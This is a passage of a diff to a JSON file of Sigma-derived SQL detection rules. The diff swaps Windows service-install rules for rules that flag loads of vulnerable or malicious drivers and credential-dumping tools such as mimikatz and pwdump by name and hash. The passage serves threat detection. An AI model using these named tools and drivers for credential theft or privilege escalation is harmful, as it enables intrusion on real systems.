'3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', 
'56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 
'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b'))" ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", "status": "experimental", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + 
"attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" ], - "filename": "win_system_mal_creddumper.yml" + "filename": 
"driver_load_win_vuln_hw_driver.yml" }, { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "status": "test", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1210", - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], - "level": "critical", + "falsepositives": [ + "There is a relevant set of false positives depending on applications in the environment" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], 
"falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "status": "test", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Anydesk Remote Access Software Service Installation", - "id": "530a6faa-ff3d-4022-b315-50828e77eef5", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Legitimate usage of the anydesk tool" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN 
('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" ], - "filename": "win_system_service_install_anydesk.yml" + "filename": "driver_load_win_mal_poortry_driver.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - System", - "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali", + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR 
ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" ], - "filename": "win_system_service_install_remote_access_software.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New PDQDeploy Service - Server Side", - "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND 
(Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" ], - "filename": "win_system_service_install_pdqdeploy.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "PsExec Service Installation", - "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "author": "Thomas Patzke", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'PSEXESVC' AND ImagePath LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\') OR (EventID = '7036' AND ServiceName = 'PSEXESVC')))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" ], - "filename": "win_system_service_install_psexec.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Vulnerable Driver Load By Name", + "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the load of known vulnerable drivers via their names only.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\mtcbsv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gameink.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\81.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sense5ext.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gvcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lurker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\enetechio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows8-10-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\corsairllaccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winflash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\paniox64.sys' ESCAPE '\\' OR ImageLoaded LIKE 
